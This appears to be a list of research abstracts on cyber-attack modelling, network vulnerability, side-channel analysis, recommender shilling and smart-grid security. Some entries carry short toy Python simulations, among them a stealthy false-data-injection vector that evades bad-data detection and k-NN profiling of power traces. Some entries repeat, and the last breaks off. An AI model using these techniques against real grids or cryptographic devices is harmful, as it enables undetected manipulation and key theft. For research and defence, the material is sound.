    National Research Council Canada - National Science Library

    Pepyne, David

    2003-01-01

    ... (as opposed to physical and other forms of attack). Information-based attacks are attacks that can be carried out from anywhere in the world, while sipping cappuccino at an Internet café or while enjoying the comfort of a living room armchair...

  12. Integrated situational awareness for cyber attack detection, analysis, and mitigation

    Science.gov (United States)

    Cheng, Yi; Sagduyu, Yalin; Deng, Julia; Li, Jason; Liu, Peng

    2012-06-01

    Real-time cyberspace situational awareness is critical for securing and protecting today's enterprise networks from various cyber threats. When a security incident occurs, network administrators and security analysts need to know what exactly has happened in the network, why it happened, and what actions or countermeasures should be taken to quickly mitigate the potential impacts. In this paper, we propose an integrated cyberspace situational awareness system for efficient cyber attack detection, analysis and mitigation in large-scale enterprise networks. Essentially, a cyberspace common operational picture will be developed, which is a multi-layer graphical model and can efficiently capture and represent the statuses, relationships, and interdependencies of various entities and elements within and among different levels of a network. Once shared among authorized users, this cyberspace common operational picture can provide an integrated view of the logical, physical, and cyber domains, and a unique visualization of disparate data sets to support decision makers. In addition, advanced analyses, such as Bayesian Network analysis, will be explored to address the information uncertainty, dynamic and complex cyber attack detection, and optimal impact mitigation issues. All the developed technologies will be further integrated into an automatic software toolkit to achieve near real-time cyberspace situational awareness and impact mitigation in large-scale computer networks.

  13. Methodology of Credit Analysis Development

    Directory of Open Access Journals (Sweden)

    Slađana Neogradi

    2017-12-01

    The subject of the research presented in this paper is the definition of a methodology for the development of credit analysis in companies and its application in lending operations in the Republic of Serbia. With the developing credit market, there is a growing need for a well-developed risk and loss prevention system. In the introduction, the process of bank analysis of the loan applicant is presented in order to minimize and manage the credit risk. In examining the subject matter, the processing of the credit application is described, along with the procedure for analyzing the financial statements in order to gain insight into the borrower's creditworthiness. In the second part of the paper, the theoretical and methodological framework applied in a concrete company is presented. In the third part, models are presented which banks should use to protect against exposure to risks; their goal is to reduce losses on loan operations in our country, as well as to adjust to market conditions in an optimal way.

  14. Stakeholder analysis methodologies resource book

    Energy Technology Data Exchange (ETDEWEB)

    Babiuch, W.M.; Farhar, B.C.

    1994-03-01

    Stakeholder analysis allows analysts to identify how parties might be affected by government projects. This process involves identifying the likely impacts of a proposed action and stakeholder groups affected by that action. Additionally, the process involves assessing how these groups might be affected and suggesting measures to mitigate any adverse effects. Evidence suggests that the efficiency and effectiveness of government actions can be increased and adverse social impacts mitigated when officials understand how a proposed action might affect stakeholders. This report discusses how to conduct useful stakeholder analyses for government officials making decisions on energy-efficiency and renewable-energy technologies and their commercialization. It discusses methodological issues that may affect the validity and reliability of findings, including sampling, generalizability, validity, "uncooperative" stakeholder groups, using social indicators, and the effect of government regulations. The Appendix contains resource directories and a list of specialists in stakeholder analysis and involvement.

  15. LOFT uncertainty-analysis methodology

    International Nuclear Information System (INIS)

    Lassahn, G.D.

    1983-01-01

    The methodology used for uncertainty analyses of measurements in the Loss-of-Fluid Test (LOFT) nuclear-reactor-safety research program is described and compared with other methodologies established for performing uncertainty analyses

  16. LOFT uncertainty-analysis methodology

    International Nuclear Information System (INIS)

    Lassahn, G.D.

    1983-01-01

    The methodology used for uncertainty analyses of measurements in the Loss-of-Fluid Test (LOFT) nuclear reactor safety research program is described and compared with other methodologies established for performing uncertainty analyses

  17. Analysis of Network Vulnerability Under Joint Node and Link Attacks

    Science.gov (United States)

    Li, Yongcheng; Liu, Shumei; Yu, Yao; Cao, Ting

    2018-03-01

    The security problem of computer network systems is becoming more and more serious. The fundamental reason is that there are security vulnerabilities in the network system, so it is very important to identify and reduce or eliminate these vulnerabilities before they are attacked. In this paper, we are interested in joint node and link attacks and propose a vulnerability evaluation method, based on the overall connectivity of the network, to defend against this attack. In particular, we analyze the attack cost problem from the attackers’ perspective. The purpose is to find the least-cost set of joint links and nodes whose deletion will lead to serious network connection damage. The simulation results show that the vulnerable elements obtained from the proposed method better match the attack approach of malicious actors in joint node and link attacks, so the proposed method has more realistic protection significance.
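
    A small networkx sketch of the underlying measurement (random topology and a heuristic attack set chosen for illustration; the paper's cost-optimization is not reproduced): delete a few nodes and links jointly and observe the drop in overall connectivity.

    ```python
    import networkx as nx

    G = nx.barabasi_albert_graph(200, 2, seed=42)      # illustrative topology

    def giant_fraction(H):
        # Fraction of the original nodes still in the largest connected component.
        return max(len(c) for c in nx.connected_components(H)) / G.number_of_nodes()

    # Joint attack: a few high-degree nodes AND a few high-betweenness links.
    top_nodes = sorted(G.degree, key=lambda d: d[1], reverse=True)[:5]
    top_links = sorted(nx.edge_betweenness_centrality(G).items(),
                       key=lambda kv: kv[1], reverse=True)[:10]

    H = G.copy()
    H.remove_nodes_from(n for n, _ in top_nodes)
    H.remove_edges_from(e for e, _ in top_links if H.has_edge(*e))
    print(f"giant component fraction: {giant_fraction(G):.2f} -> {giant_fraction(H):.2f}")
    ```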

  18. Robustness analysis of interdependent networks under multiple-attacking strategies

    Science.gov (United States)

    Gao, Yan-Li; Chen, Shi-Ming; Nie, Sen; Ma, Fei; Guan, Jun-Jie

    2018-04-01

    The robustness of complex networks under attack largely depends on the structure of the network and the nature of the attacks. Previous research on interdependent networks has focused on two types of initial attack: random attack and degree-based targeted attack. In this paper, a deliberate attack function is proposed, from which six kinds of deliberate attacking strategies can be derived by adjusting the tunable parameters. Moreover, the robustness of four types of interdependent networks (BA-BA, ER-ER, BA-ER and ER-BA) with different coupling modes (random, positive and negative correlation) is evaluated under the different attacking strategies. Several interesting conclusions are obtained. The positive coupling mode makes the vulnerability of the interdependent network depend entirely on the most vulnerable sub-network under deliberate attacks, whereas random and negative coupling modes make the vulnerability depend mainly on the sub-network being attacked. The robustness of the interdependent network is enhanced as the degree-degree correlation coefficient varies from positive to negative. The negative coupling mode is therefore relatively more favorable than the others, as it can substantially improve the robustness of the ER-ER and ER-BA networks. In terms of attacking strategies on interdependent networks, the degree information of a node is more valuable than its betweenness. In addition, we found a more efficient attacking strategy for each coupled interdependent network and proposed the corresponding protection strategy for suppressing cascading failure. Our results can be very useful for the safety design and protection of interdependent networks.

  19. Attack Pattern Analysis Framework for a Multiagent Intrusion Detection System

    Directory of Open Access Journals (Sweden)

    Krzysztof Juszczyszyn

    2008-08-01

    The paper proposes the use of an attack pattern ontology and a formal framework for network traffic anomaly detection within a distributed multi-agent Intrusion Detection System architecture. Our framework assumes an ontology-based attack definition and a distributed processing scheme with exchange of messages between agents. The role of traffic anomaly detection is presented, and it is discussed how some specific values characterizing network communication can be used to detect network anomalies caused by security incidents (worm attacks, virus spreading). Finally, it is defined how to use the proposed techniques in a distributed IDS using the attack pattern ontology.

  20. k-Nearest Neighbors Algorithm in Profiling Power Analysis Attacks

    Directory of Open Access Journals (Sweden)

    Z. Martinasek

    2016-06-01

    Power analysis presents a typical example of successful attacks against trusted cryptographic devices such as RFID (Radio-Frequency IDentification) and contact smart cards. In recent years, the cryptographic community has explored new approaches in power analysis based on machine learning models such as the Support Vector Machine (SVM), RF (Random Forest) and Multi-Layer Perceptron (MLP). In this paper, we made an extensive comparison of machine learning algorithms in power analysis. For this purpose, we implemented a verification program that always chooses the optimal settings of the individual machine learning models in order to obtain the best classification accuracy. In our research, we used three datasets, the first containing the power traces of an unprotected AES (Advanced Encryption Standard) implementation. The second and third datasets were created independently from publicly available power traces corresponding to a masked AES implementation (DPA Contest v4). The obtained results revealed some interesting facts, namely that an elementary k-NN (k-Nearest Neighbors) algorithm, which has not yet been commonly used in power analysis, shows great application potential in practice.
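
    A minimal profiled-attack sketch with scikit-learn's k-NN on synthetic Hamming-weight leakage, mirroring the kind of comparison the paper reports; the trace simulation (one leaky time sample plus Gaussian noise) is an assumption, not the DPA Contest data.

    ```python
    import numpy as np
    from sklearn.neighbors import KNeighborsClassifier

    rng = np.random.default_rng(0)
    HW = np.array([bin(v).count("1") for v in range(256)])

    def traces(labels, n_samples=8, noise=0.3):
        """Synthetic power traces: one sample leaks HW(label), the rest is noise."""
        base = rng.normal(0.0, noise, (len(labels), n_samples))
        base[:, 3] += HW[labels]
        return base

    # Profiling phase on a device the attacker controls, then the attack phase.
    y_prof = rng.integers(0, 256, 5000)
    y_att = rng.integers(0, 256, 500)
    clf = KNeighborsClassifier(n_neighbors=5).fit(traces(y_prof), HW[y_prof])
    print(f"Hamming-weight accuracy: {clf.score(traces(y_att), HW[y_att]):.2f}")
    ```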

  1. Quantitative security and safety analysis with attack-fault trees

    NARCIS (Netherlands)

    Kumar, Rajesh; Stoelinga, Mariëlle Ida Antoinette

    2017-01-01

    Cyber physical systems, like power plants, medical devices and data centers have to meet high standards, both in terms of safety (i.e. absence of unintentional failures) and security (i.e. no disruptions due to malicious attacks). This paper presents attack fault trees (AFTs), a formalism that

  2. Anti-discrimination Analysis Using Privacy Attack Strategies

    KAUST Repository

    Ruggieri, Salvatore

    2014-09-15

    Social discrimination discovery from data is an important task to identify illegal and unethical discriminatory patterns towards protected-by-law groups, e.g., ethnic minorities. We deploy privacy attack strategies as tools for discrimination discovery under hard assumptions which have rarely been tackled in the literature: indirect discrimination discovery, privacy-aware discrimination discovery, and discrimination data recovery. The intuition comes from the intriguing parallel between the role of the anti-discrimination authority in the three scenarios above and the role of an attacker in private data publishing. We design strategies and algorithms inspired by and based on Fréchet bounds attacks, attribute inference attacks, and minimality attacks for the purpose of unveiling hidden discriminatory practices. Experimental results show that they can be effective tools in the hands of anti-discrimination authorities.

  3. A Comprehensive Taxonomy and Analysis of IEEE 802.15.4 Attacks

    Directory of Open Access Journals (Sweden)

    Yasmin M. Amin

    2016-01-01

    Full Text Available The IEEE 802.15.4 standard has been established as the dominant enabling technology for Wireless Sensor Networks (WSNs. With the proliferation of security-sensitive applications involving WSNs, WSN security has become a topic of great significance. In comparison with traditional wired and wireless networks, WSNs possess additional vulnerabilities which present opportunities for attackers to launch novel and more complicated attacks against such networks. For this reason, a thorough investigation of attacks against WSNs is required. This paper provides a single unified survey that dissects all IEEE 802.15.4 PHY and MAC layer attacks known to date. While the majority of existing references investigate the motive and behavior of each attack separately, this survey classifies the attacks according to clear metrics within the paper and addresses the interrelationships and differences between the attacks following their classification. The authors’ opinions and comments regarding the placement of the attacks within the defined classifications are also provided. A comparative analysis between the classified attacks is then performed with respect to a set of defined evaluation criteria. The first half of this paper addresses attacks on the IEEE 802.15.4 PHY layer, whereas the second half of the paper addresses IEEE 802.15.4 MAC layer attacks.

  4. Causal Meta-Analysis : Methodology and Applications

    NARCIS (Netherlands)

    Bax, L.J.

    2009-01-01

    Meta-analysis is a statistical method to summarize research data from multiple studies in a quantitative manner. This dissertation addresses a number of methodological topics in causal meta-analysis and reports the development and validation of meta-analysis software. In the first (methodological)

  5. Safety analysis methodology for OPR 1000

    International Nuclear Information System (INIS)

    Hwang-Yong, Jun

    2005-01-01

    Korea Electric Power Research Institute (KEPRI) has been developing an in-house safety analysis methodology based on the dedicated codes available to KEPRI to overcome the problems arising from currently used vendor-oriented methodologies. For the Loss of Coolant Accident (LOCA) analysis, the KREM (KEPRI Realistic Evaluation Methodology) has been developed based on the RELAP-5 code. The methodology was approved for the Westinghouse 3-loop plants by the Korean regulatory organization, and the project to extend the methodology to the Optimized Power Reactor 1000 (OPR1000) has been ongoing since 2001. Also, for the Non-LOCA analysis, the KNAP (Korea Non-LOCA Analysis Package) has been developed using the UNICORN-TM code system. To demonstrate the feasibility of these code systems and methodologies, some typical cases of the design basis accidents mentioned in the final safety analysis report (FSAR) were analyzed. (author)

  6. Anti-discrimination Analysis Using Privacy Attack Strategies

    KAUST Repository

    Ruggieri, Salvatore; Hajian, Sara; Kamiran, Faisal; Zhang, Xiangliang

    2014-01-01

    Social discrimination discovery from data is an important task to identify illegal and unethical discriminatory patterns towards protected-by-law groups, e.g., ethnic minorities. We deploy privacy attack strategies as tools for discrimination

  7. Shilling Attacks Detection in Recommender Systems Based on Target Item Analysis.

    Science.gov (United States)

    Zhou, Wei; Wen, Junhao; Koh, Yun Sing; Xiong, Qingyu; Gao, Min; Dobbie, Gillian; Alam, Shafiq

    2015-01-01

    Recommender systems are highly vulnerable to shilling attacks, both by individuals and groups. Attackers who introduce biased ratings in order to affect recommendations have been shown to negatively affect collaborative filtering (CF) algorithms. Previous research focuses only on the differences between genuine profiles and attack profiles, ignoring the group characteristics in attack profiles. In this paper, we study the use of statistical metrics to detect rating patterns of attackers and group characteristics in attack profiles. Another issue is that most existing detection methods are model-specific. Two metrics, Rating Deviation from Mean Agreement (RDMA) and Degree of Similarity with Top Neighbors (DegSim), are used for analyzing rating patterns between malicious profiles and genuine profiles in attack models. Building upon this, we also propose and evaluate a detection structure called RD-TIA for detecting shilling attacks in recommender systems using a statistical approach. In order to detect more complicated attack models, we propose a novel metric called DegSim' based on DegSim. The experimental results show that our detection model based on target item analysis is an effective approach for detecting shilling attacks.
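
    A small sketch of the RDMA metric on a toy ratings matrix, following the commonly cited definition (mean of |r_ui - item mean|, weighted by the inverse of the item's rating count); the data are invented and the paper's exact weighting may differ.

    ```python
    import numpy as np

    # Toy user-item ratings (0 = unrated). The last user is a push-attack profile:
    # it mimics the crowd on popular items but pushes the sparsely rated target item.
    R = np.array([
        [5, 3, 4, 1, 1],
        [4, 3, 4, 1, 0],
        [5, 2, 4, 2, 1],
        [4, 3, 3, 1, 0],
        [5, 3, 4, 1, 5],   # attack profile; target item = last column
    ], dtype=float)

    rated = R > 0
    n_ratings = np.maximum(rated.sum(axis=0), 1)      # NR_i
    item_mean = R.sum(axis=0) / n_ratings             # mean over given ratings

    def rdma(u):
        idx = rated[u]
        return np.mean(np.abs(R[u, idx] - item_mean[idx]) / n_ratings[idx])

    for u in range(R.shape[0]):
        tag = "  <- attack profile" if u == R.shape[0] - 1 else ""
        print(f"user {u}: RDMA = {rdma(u):.3f}{tag}")   # the attacker scores highest here
    ```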

  8. Shilling Attacks Detection in Recommender Systems Based on Target Item Analysis

    Science.gov (United States)

    Zhou, Wei; Wen, Junhao; Koh, Yun Sing; Xiong, Qingyu; Gao, Min; Dobbie, Gillian; Alam, Shafiq

    2015-01-01

    Recommender systems are highly vulnerable to shilling attacks, both by individuals and groups. Attackers who introduce biased ratings in order to affect recommendations, have been shown to negatively affect collaborative filtering (CF) algorithms. Previous research focuses only on the differences between genuine profiles and attack profiles, ignoring the group characteristics in attack profiles. In this paper, we study the use of statistical metrics to detect rating patterns of attackers and group characteristics in attack profiles. Another question is that most existing detecting methods are model specific. Two metrics, Rating Deviation from Mean Agreement (RDMA) and Degree of Similarity with Top Neighbors (DegSim), are used for analyzing rating patterns between malicious profiles and genuine profiles in attack models. Building upon this, we also propose and evaluate a detection structure called RD-TIA for detecting shilling attacks in recommender systems using a statistical approach. In order to detect more complicated attack models, we propose a novel metric called DegSim’ based on DegSim. The experimental results show that our detection model based on target item analysis is an effective approach for detecting shilling attacks. PMID:26222882

  9. Stealthy false data injection attacks using matrix recovery and independent component analysis in smart grid

    Science.gov (United States)

    JiWei, Tian; BuHong, Wang; FuTe, Shang; Shuaiqi, Liu

    2017-05-01

    Exact state estimation is vitally important to maintain normal operations of smart grids. Existing research demonstrates that state estimation output can be compromised by malicious attacks. However, to construct the attack vectors, a usual presumption in most works is that the attacker has perfect information regarding the topology and so on, even though such information is difficult to acquire in practice. Recent research shows that Independent Component Analysis (ICA) can be used to infer topology information, which can be used to originate undetectable attacks and even to alter the price of electricity for the profit of attackers. However, we found that the above ICA-based blind attack tactic is only feasible in an environment with Gaussian noise. If there are outliers (device malfunction and communication errors), the Bad Data Detector will easily detect the attack. Hence, we propose a robust ICA-based blind attack strategy in which matrix recovery is used to circumvent the outlier problem and construct stealthy attack vectors. The proposed attack strategies are tested on the representative IEEE 14-bus system. Simulations verify the feasibility of the proposed method.
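
    A compact numerical sketch of why injections of the form a = Hc pass residual-based bad-data detection in linear (DC) state estimation; random matrices stand in for a real grid model, and the ICA/matrix-recovery topology-inference step of the paper is not reproduced.

    ```python
    import numpy as np

    rng = np.random.default_rng(0)
    m, n = 20, 8                           # measurements, states (toy dimensions)
    H = rng.normal(size=(m, n))            # measurement (topology) matrix
    x = rng.normal(size=n)                 # true state
    z = H @ x + 0.01 * rng.normal(size=m)  # noisy measurements

    def residual_norm(z_meas):
        x_hat, *_ = np.linalg.lstsq(H, z_meas, rcond=None)   # least-squares estimate
        return np.linalg.norm(z_meas - H @ x_hat)

    c = rng.normal(size=n)        # state perturbation chosen by the attacker
    stealthy = H @ c              # attack vector in the column space of H
    noisy = rng.normal(size=m)    # arbitrary injection for comparison

    print(f"no attack       r = {residual_norm(z):.4f}")
    print(f"stealthy a = Hc r = {residual_norm(z + stealthy):.4f}")   # unchanged
    print(f"random a        r = {residual_norm(z + noisy):.4f}")      # flagged
    ```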

  10. On-line diagnosis and recovery of adversary attack using logic flowgraph methodology simulation

    International Nuclear Information System (INIS)

    Guarro, S.B.

    1986-01-01

    The Logic Flowgraph Methodology (LFM) allows the construction of special graph models for simulation of complex processes of causality, including feedback loops and sequential effects. Among the most notable features of LFM is the formal inclusion in its models of causality conditioning by logic switches imbedded in the modeled process, such as faults or modes of operation. The LFM model of a process is a graph structure that captures, in one synthetic representation, the relevant success and fault space characterization of that process. LFM is very similar to an artificial intelligence expert system shell. To illustrate the utilization of LFM, an application to the assessment and on-line monitoring of a material control facility is presented. The LFM models are used to model adversary action and control response, and to generate mini-diagnostic and recovery trees in real time, as well as reliability trees for off-line evaluation. Although the case study presented is for an imaginary facility, most of the conceptual elements that would be present in a real application have been retained in order to highlight the features and capabilities of the methodology.

  11. Preliminary safety analysis methodology for the SMART

    Energy Technology Data Exchange (ETDEWEB)

    Bae, Kyoo Hwan; Chung, Y. J.; Kim, H. C.; Sim, S. K.; Lee, W. J.; Chung, B. D.; Song, J. H. [Korea Atomic Energy Research Institute, Taejeon (Korea)

    2000-03-01

    This technical report was prepared for a preliminary safety analysis methodology of the 330MWt SMART (System-integrated Modular Advanced ReacTor) which has been developed by Korea Atomic Energy Research Institute (KAERI) and funded by the Ministry of Science and Technology (MOST) since July 1996. This preliminary safety analysis methodology has been used to identify an envelope for the safety of the SMART conceptual design. As the SMART design evolves, further validated final safety analysis methodology will be developed. Current licensing safety analysis methodology of the Westinghouse and KSNPP PWRs operating and under development in Korea as well as the Russian licensing safety analysis methodology for the integral reactors have been reviewed and compared to develop the preliminary SMART safety analysis methodology. SMART design characteristics and safety systems have been reviewed against licensing practices of the PWRs operating or KNGR (Korean Next Generation Reactor) under construction in Korea. Detailed safety analysis methodology has been developed for the potential SMART limiting events of main steam line break, main feedwater pipe break, loss of reactor coolant flow, CEA withdrawal, primary to secondary pipe break and the small break loss of coolant accident. SMART preliminary safety analysis methodology will be further developed and validated in parallel with the safety analysis codes as the SMART design further evolves. Validated safety analysis methodology will be submitted to MOST as a Topical Report for a review of the SMART licensing safety analysis methodology. Thus, it is recommended for the nuclear regulatory authority to establish regulatory guides and criteria for the integral reactor. 22 refs., 18 figs., 16 tabs. (Author)

  12. Depletion-of-Battery Attack: Specificity, Modelling and Analysis.

    Science.gov (United States)

    Shakhov, Vladimir; Koo, Insoo

    2018-06-06

    The emerging Internet of Things (IoT) has great potential; however, the societal costs of the IoT can outweigh its benefits. To unlock IoT potential, there needs to be improvement in the security of IoT applications. There are several standardization initiatives for sensor networks, which eventually converge with the Internet of Things. As sensor-based applications are deployed, security emerges as an essential requirement. One of the critical issues of wireless sensor technology is limited sensor resources, including sensor batteries. This creates a vulnerability to battery-exhausting attacks. Rapid exhaustion of sensor battery power is not only explained by intrusions, but can also be due to random failure of embedded sensor protocols. Thus, most wireless sensor applications, without tools to defend against rash battery exhaustion, would be unable to function for their prescribed lifetimes. In this paper, we consider a special type of threat, in which the harm is malicious depletion of sensor battery power. In contrast to the traditional denial-of-service attack, quality of service under the considered attack is not necessarily degraded. Moreover, the quality of service can increase up to the moment the sensor set crashes. We argue that this is a distinct type of attack. Hence, the application of a traditional defense mechanism against this threat is not always possible. Therefore, effective methods should be developed to counter the threat. We first discuss the feasibility of rash depletion of battery power. Next, we propose a model for evaluation of energy consumption when under attack. Finally, a technique to counter the attack is discussed.
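
    A back-of-the-envelope energy-budget sketch of the threat (all currents, duty cycles, and battery figures are illustrative assumptions): forcing frequent radio wake-ups raises the average current draw and collapses the node's lifetime long before its design target.

    ```python
    battery_mAh = 2400.0                  # roughly two AA cells
    sleep_mA, active_mA = 0.005, 20.0     # typical sensor-node orders of magnitude

    def lifetime_days(wakeups_per_hour, active_ms=50):
        active_fraction = wakeups_per_hour * active_ms / 3.6e6
        avg_mA = active_mA * active_fraction + sleep_mA * (1 - active_fraction)
        return battery_mAh / avg_mA / 24

    print(f"normal duty cycle  (60 wake-ups/h): {lifetime_days(60):7.0f} days")
    print(f"under attack     (7200 wake-ups/h): {lifetime_days(7200):7.0f} days")
    ```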

  13. Depletion-of-Battery Attack: Specificity, Modelling and Analysis

    Directory of Open Access Journals (Sweden)

    Vladimir Shakhov

    2018-06-01

    Full Text Available The emerging Internet of Things (IoT) has great potential; however, the societal costs of the IoT can outweigh its benefits. To unlock IoT potential, there needs to be improvement in the security of IoT applications. There are several standardization initiatives for sensor networks, which eventually converge with the Internet of Things. As sensor-based applications are deployed, security emerges as an essential requirement. One of the critical issues of wireless sensor technology is limited sensor resources, including sensor batteries. This creates a vulnerability to battery-exhausting attacks. Rapid exhaustion of sensor battery power is not only explained by intrusions, but can also be due to random failure of embedded sensor protocols. Thus, without tools to defend against rapid battery exhaustion, most wireless sensor applications would be unable to function for their prescribed lifetimes. In this paper, we consider a special type of threat, in which the harm is malicious depletion of sensor battery power. In contrast to the traditional denial-of-service attack, quality of service under the considered attack is not necessarily degraded. Moreover, the quality of service can even increase up to the moment the sensor set crashes. We argue that this is a distinct type of attack. Hence, the application of a traditional defense mechanism against this threat is not always possible, and effective methods should be developed to counter it. We first discuss the feasibility of rapid depletion of battery power. Next, we propose a model for evaluation of energy consumption when under attack. Finally, a technique to counter the attack is discussed.
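
    As a rough illustration of the kind of energy-consumption evaluation described in the two records above, the sketch below simulates how quickly a node's battery drains when bogus traffic is injected on top of legitimate traffic. The Poisson-arrival assumption, the per-packet energy cost, and every numeric parameter are invented for illustration; this is not the authors' model.

```python
import random

def time_to_depletion(capacity_j, idle_w, rx_cost_j, legit_rate_hz, attack_rate_hz, seed=0):
    """Simulate battery drain of a single sensor node (illustrative parameters).

    capacity_j     -- battery capacity in joules
    idle_w         -- baseline idle power draw in watts
    rx_cost_j      -- energy spent handling one received packet
    legit_rate_hz  -- mean rate of legitimate packets (Poisson arrivals)
    attack_rate_hz -- mean rate of bogus packets injected by the attacker
    """
    rng = random.Random(seed)
    battery, t = capacity_j, 0.0
    total_rate = legit_rate_hz + attack_rate_hz
    while battery > 0:
        dt = rng.expovariate(total_rate)      # time until the next packet arrives
        battery -= idle_w * dt                # idle drain while waiting
        battery -= rx_cost_j                  # cost of processing the packet
        t += dt
    return t

baseline = time_to_depletion(50.0, 0.001, 0.005, legit_rate_hz=0.2, attack_rate_hz=0.0)
attacked = time_to_depletion(50.0, 0.001, 0.005, legit_rate_hz=0.2, attack_rate_hz=2.0)
print(f"lifetime without attack: {baseline/3600:.1f} h, under attack: {attacked/3600:.1f} h")
```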

  14. Ancestry Analysis in the 11-M Madrid Bomb Attack Investigation

    Science.gov (United States)

    Phillips, Christopher; Prieto, Lourdes; Fondevila, Manuel; Salas, Antonio; Gómez-Tato, Antonio; Álvarez-Dios, José; Alonso, Antonio; Blanco-Verea, Alejandro; Brión, María; Montesino, Marta; Carracedo, Ángel; Lareu, María Victoria

    2009-01-01

    The 11-M Madrid commuter train bombings of 2004 constituted the second biggest terrorist attack to occur in Europe after Lockerbie, while the subsequent investigation became the most complex and wide-ranging forensic case in Spain. Standard short tandem repeat (STR) profiling of 600 exhibits left certain key incriminatory samples unmatched to any of the apprehended suspects. A judicial order to perform analyses of unmatched samples to differentiate European and North African ancestry became a critical part of the investigation and was instigated to help refine the search for further suspects. Although mitochondrial DNA (mtDNA) and Y-chromosome markers routinely demonstrate informative geographic differentiation, the populations compared in this analysis were known to show a proportion of shared mtDNA and Y haplotypes as a result of recent gene-flow across the western Mediterranean, while any two loci can be unrepresentative of the ancestry of an individual as a whole. We based our principal analysis on a validated 34plex autosomal ancestry-informative-marker single nucleotide polymorphism (AIM-SNP) assay to make an assignment of ancestry for DNA from seven unmatched case samples including a handprint from a bag containing undetonated explosives together with personal items recovered from various locations in Madrid associated with the suspects. To assess marker informativeness before genotyping, we predicted the probable classification success for the 34plex assay with standard error estimators for a naïve Bayesian classifier using Moroccan and Spanish training sets (each n = 48). Once misclassification error was found to be sufficiently low, genotyping yielded seven near-complete profiles (33 of 34 AIM-SNPs) that in four cases gave probabilities providing a clear assignment of ancestry. One of the suspects predicted to be North African by AIM-SNP analysis of DNA from a toothbrush was identified late in the investigation as Algerian in origin. The results
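
    The record above mentions a naïve Bayesian classifier over ancestry-informative SNPs. The sketch below shows the general form such a two-population classifier can take under Hardy-Weinberg assumptions; the five markers, allele frequencies, and genotypes are hypothetical and are not taken from the actual 34plex assay or its training sets.

```python
import math

def genotype_likelihood(geno, p):
    """P(genotype | population) for a biallelic SNP under Hardy-Weinberg equilibrium,
    where p is the reference-allele frequency and geno counts reference alleles (0/1/2)."""
    q = 1.0 - p
    return {0: q * q, 1: 2 * p * q, 2: p * p}[geno]

def classify(genotypes, freqs_a, freqs_b, prior_a=0.5):
    """Naive Bayes assignment between two reference populations A and B.
    genotypes: list of 0/1/2 calls; freqs_a/freqs_b: per-marker allele frequencies."""
    log_a, log_b = math.log(prior_a), math.log(1.0 - prior_a)
    for g, pa, pb in zip(genotypes, freqs_a, freqs_b):
        log_a += math.log(genotype_likelihood(g, pa))
        log_b += math.log(genotype_likelihood(g, pb))
    return 1.0 / (1.0 + math.exp(log_b - log_a))   # posterior probability of population A

# Toy example with 5 hypothetical ancestry-informative markers
freqs_pop_a = [0.9, 0.8, 0.2, 0.7, 0.1]
freqs_pop_b = [0.4, 0.3, 0.7, 0.2, 0.6]
sample = [2, 2, 0, 2, 0]
print(f"P(population A | genotypes) = {classify(sample, freqs_pop_a, freqs_pop_b):.3f}")
```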

  15. Denial-of-service attack detection based on multivariate correlation analysis

    NARCIS (Netherlands)

    Tan, Zhiyuan; Jamdagni, Aruna; He, Xiangjian; Nanda, Priyadarsi; Liu, Ren Ping; Lu, Bao-Liang; Zhang, Liqing; Kwok, James

    2011-01-01

    The reliability and availability of network services are being threatened by the growing number of Denial-of-Service (DoS) attacks. Effective mechanisms for DoS attack detection are demanded. Therefore, we propose a multivariate correlation analysis approach to investigate and extract second-order
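
    The abstract above is truncated, but the underlying idea of profiling normal traffic and scoring deviations can be illustrated with a generic multivariate sketch such as the one below, which scores records by Mahalanobis distance from a learned normal profile. This is only a stand-in for the authors' multivariate correlation analysis, not their method, and the features and threshold are invented.

```python
import numpy as np

def build_profile(normal_records):
    """Learn a normal-traffic profile: mean vector and (pseudo-)inverse covariance."""
    X = np.asarray(normal_records, dtype=float)
    mu = X.mean(axis=0)
    cov = np.cov(X, rowvar=False)
    return mu, np.linalg.pinv(cov)

def anomaly_score(record, mu, cov_inv):
    """Mahalanobis distance of one traffic record from the normal profile."""
    d = np.asarray(record, dtype=float) - mu
    return float(np.sqrt(d @ cov_inv @ d))

# Hypothetical features per record: [packets/s, bytes/s, distinct source IPs]
normal = [[120, 9.6e4, 14], [135, 1.1e5, 16], [110, 8.8e4, 12], [128, 1.0e5, 15]]
mu, cov_inv = build_profile(normal)
threshold = 3.0  # illustrative cut-off only
flood = [4200, 2.9e6, 900]
print("DoS suspected" if anomaly_score(flood, mu, cov_inv) > threshold else "normal")
```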

  16. Methodology for Validating Building Energy Analysis Simulations

    Energy Technology Data Exchange (ETDEWEB)

    Judkoff, R.; Wortman, D.; O'Doherty, B.; Burch, J.

    2008-04-01

    The objective of this report was to develop a validation methodology for building energy analysis simulations, collect high-quality, unambiguous empirical data for validation, and apply the validation methodology to the DOE-2.1, BLAST-2MRT, BLAST-3.0, DEROB-3, DEROB-4, and SUNCAT 2.4 computer programs. This report covers background information, literature survey, validation methodology, comparative studies, analytical verification, empirical validation, comparative evaluation of codes, and conclusions.

  17. Modeling and Analysis of Information Attack in Computer Networks

    National Research Council Canada - National Science Library

    Pepyne, David

    2003-01-01

    .... Such attacks are particularly problematic because they take place in a "virtual cyber world" that lacks the social, economic, legal, and physical barriers and protections that control and limit crime in the material world. Research outcomes include basic theory, a modeling framework for Internet worms and email viruses, a sensor for user profiling, and a simple protocol for enhancing wireless security.

  18. Critical location identification and vulnerability analysis of interdependent infrastructure systems under spatially localized attacks

    International Nuclear Information System (INIS)

    Ouyang, Min

    2016-01-01

    Infrastructure systems are usually spatially distributed in a wide area and are subject to many types of hazards. For each type of hazard, modeling its direct impact on infrastructure components and analyzing the induced system-level vulnerability are important for identifying mitigation strategies. This paper mainly studies spatially localized attacks, in which a set of infrastructure components located within or crossing a circle-shaped localized area is subject to damage while other components do not directly fail. For this type of attack, taking the interdependent power and gas systems in Harris County, Texas, USA as an example, this paper proposes an approach to exactly identify critical locations in interdependent infrastructure systems and to carry out pertinent vulnerability analysis. Results show that (a) infrastructure interdependencies and attack radius largely affect the position of critical locations; (b) spatially localized attacks cause less vulnerability than equivalent random failures; (c) for most values of attack radius, critical locations identified by considering only node failures do not change when considering both node and edge failures in the attack area; (d) for many values of attack radius, critical locations identified by the topology-based model are also critical from the flow-based perspective. - Highlights: • We propose a method to identify critical locations in interdependent infrastructures. • Geographical interdependencies and attack radius largely affect critical locations. • Localized attacks cause less vulnerability than equivalent random failures. • Whether considering both node and edge failures affects critical locations. • Topology-based critical locations are also critical from flow-based perspective.

  19. [Comparative analysis of phenomenology of paroxysms of atrial fibrillation and panic attacks].

    Science.gov (United States)

    San'kova, T A; Solov'eva, A D; Nedostup, A V

    2004-01-01

